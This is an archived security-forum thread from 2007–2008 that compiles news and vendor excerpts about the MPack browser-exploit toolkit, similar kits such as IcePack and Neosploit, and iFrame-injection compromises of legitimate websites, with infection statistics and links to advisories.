View Full Version : MPack Analysis (follow-up)

2007-06-25, 11:07
RE: http://isc.sans.org/diary.html?storyid=3015

- http://blog.trendmicro.com/pornography-is-bad-for-you21/
June 22, 2007 ~ "Be careful in searching for porn sites, you may get other forms of “malicious” content that is definitely undesireable. Just a few days after the infamous Italian Job malware, Trend Micro found another one with a similar modus operandi, but instead of hacked Italian web sites, the infection chain starts on certain pornographic sites... The detections for web pages containing the obfuscated IFRAME code, as well as the script file that downloads TROJ_AGENT.QMN are still being created as of writing. This particular attack uses the tookit MPack v0.86, the same one used in the Italian Job attack, and, despite only having 197 domains with IFRAMEs (as compared to the Italian Job’s 10,000++ domains), are able to infect twice as much as the Italian Job. It is most likely this attack was made online sometime last week, around June 17..."


2007-08-01, 14:12

- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=201202240
Aug. 1, 2007 - "A hacking tool for sale in the Russian underground is in the hands of 58 criminals who have infected more than 500,000 users, according to a security research firm. The MPack toolkit is a powerful exploitation tool that launches attacks against Web browsers. Ken Dunham, a senior engineer with VeriSign-iDefense reported this summer that the toolkit leverages multiple exploits -- including the Windows ANI bug and a QuickTime overflow bug -- to compromise computers. Finjan Software, Inc., a security company, reported this week that the malware being used within MPack is going after users' bank account information, such as user names, passwords, credit card numbers and Social Security numbers. And it's a highly successful tool, with an infection ratio of 16% of 3.1 million infection attempts. "The crimeware is capable of stealing account information from several banks around the world without leaving any traces behind," Finjan researchers reported in an advisory. "Stolen data is being sent to the criminals over a secure communication channel (SSL) to avoid detection. Users whose machines were infected by this crimeware will not notice any change to their normal PC and online browsing experience. The rootkit nature of the crimeware leaves no sign and does not impact the end-user experience." To make matters even worse for users and IT managers, the malware downloaded by the MPack toolkit is still not detected by the majority of popular security products, according to Finjan. And that makes it very effective in infecting PCs... the crimeware takes over the browser and creates a copy of the real banking page in real-time so the user is further tricked into thinking they're at a legitimate site. For each financial institution, the crimeware sends a customized set of crafted forms and pages, designed to harvest the specific information needed to log into that particular service. The crimeware is spread by compromised, legitimate sites that have malicious code embedded in them... VeriSign-iDefense also reported that attacks from MPack date back to October 2006."
> http://www.finjan.com/Pressrelease.aspx?id=1629&PressLan=1230&lan=3
July 31, 2007

> http://isc.sans.org/diary.html?storyid=3015


2007-09-18, 16:33

- http://www.symantec.com/about/news/release/article.jsp?prid=20070917_01
Sept. 17, 2007 - "...During the reporting period of Jan. 1, 2007, through June 30, 2007, Symantec detected an increase in cyber criminals leveraging sophisticated toolkits to carry out malicious attacks. One example of this strategy was MPack, a professionally developed toolkit sold in the underground economy. Once purchased, attackers could deploy MPack’s collection of software components to install malicious code on thousands of computers around the world and then monitor the success of the attack through various metrics on its online, password protected control and management console. MPack also exemplifies a coordinated attack, which Symantec reported as a growing trend in the previous volume of the ISTR where cyber criminals deploy a combination of malicious activity. Phishing toolkits, which are a series of scripts that allow an attacker to automatically set up phishing Web sites that spoof legitimate Web sites, are also available for professional and commercial cybercrime. The top three most widely used phishing toolkits were responsible for 42 percent of all phishing attacks detected during the reporting period...
- Increase in Cyber Criminals Exploiting Trusted Environments to Target Victims...
- Rise in Multi-Staged Attacks...
- Additional Key Findings
* Credit cards were the most commonly advertised commodity on underground economy servers, making up 22 percent of all advertisements; bank accounts were in close second with 21 percent.
* Symantec documented 237 vulnerabilities in Web browser plug-ins. This is a significant increase over 74 in the second half of 2006, and 34 in the first half of 2006.
* Malicious code that attempted to steal account information for online games made up 5 percent of the top 50 malicious code samples by potential infection. Online gaming is becoming one of the most popular Internet activities and often features goods that can be purchased for real money, which provides a potential opportunity for attackers to benefit financially.
* Spam made up 61 percent of all monitored e-mail traffic, representing a slight increase over the last six months of 2006 when 59 percent of e-mail was classified as spam.
* Theft or loss of computer or other data-storage medium made up 46 percent of all data breaches that could lead to identity theft. Similarly, Symantec’s IT Risk Management Report found that 58 percent of enterprises expect a major data loss at least once every 5 years..."


2008-01-18, 20:15

- http://preview.tinyurl.com/2sf38b
Sans.org (Top 10 Cyber Security Menaces - 2008)
"...One of the latest such modules, mpack, produces a claimed 10-25% success rate in exploiting browsers that visit sites infected with the module..."


2008-02-08, 23:37
FYI... Hackers seed malware on multiple sites

- http://www.theregister.co.uk/2008/02/08/indian_av_site_compromise/
8 February 2008 - "Hackers planted malicious script on the site of an Indian anti-virus firm this week. The website of AVsoft Technologies was attacked by unidentified miscreants in order to distribute a variant of the Virut virus. AVsoft Technologies makes the SmartCOP antivirus package. One of the download pages of the site was boobytrapped with malicious code that used the infamous iFrame exploit to push copies of the Virut virus onto visiting unpatched (or poorly patched) Windows PCs. The technique is a popular method for turning the websites of legitimate organisations into sites for drive-by malware downloads. Virut opens up a backdoor on infected PCs, allowing hackers to download and run other malware (or anything else they fancy) onto infected computers..."
> http://annysoft.wordpress.com/2008/02/06/antivirus-company-website-is-infected/
8 Feb 2008 - "Malicious IFRAME has been removed... This all is used by the infamous (underground networks!!) tool 'IcePack'..."

- http://www.techworld.com/security/news/index.cfm?newsID=11361&pagtype=all
02/08/08 - "The Web site of one of the U.K.'s most famous landmarks, the Forth Road Bridge, has been torn open in embarrassing fashion to serve malware, researchers are reporting. According to the security blog of a small consultancy, Roundtrip Solutions, the Web site is now hosting an 'obfuscated' Javascript hack created using the Neosploit Crimeware Toolkit, dishing out payloads including, the blog reports, porn pop-ups... The actual code embedded on the site's web server appears to point to a server in Turkey, returning instructions directing visitors to the BBC Web site, only -occasionally- delivering a more serious Javascript payload, essentially anything its creators wished... The hack doesn't appear to have been hard for the researchers to spot using Exploit Labs' (now AVG's) Linkscanner Pro firewall-oriented scanning software. Security vendor Finjan confirmed the hack as genuine... Website hacks of this sort are becoming more common, with Neosploit, Icepack, and the well-known Mpack attack kits now in common circulation..."

- http://preview.tinyurl.com/3b5ddu
February 07, 2008 (Infoworld) - "...According to Roger Thompson, chief research officer with security vendor AVG... "They let one of their pages get hit by an iFrame injection," he said. "It shows that anyone can be a victim... It's hard to protect Web servers properly." The technique used on the site has been seen in -thousands- of similar hacks over the past few months..."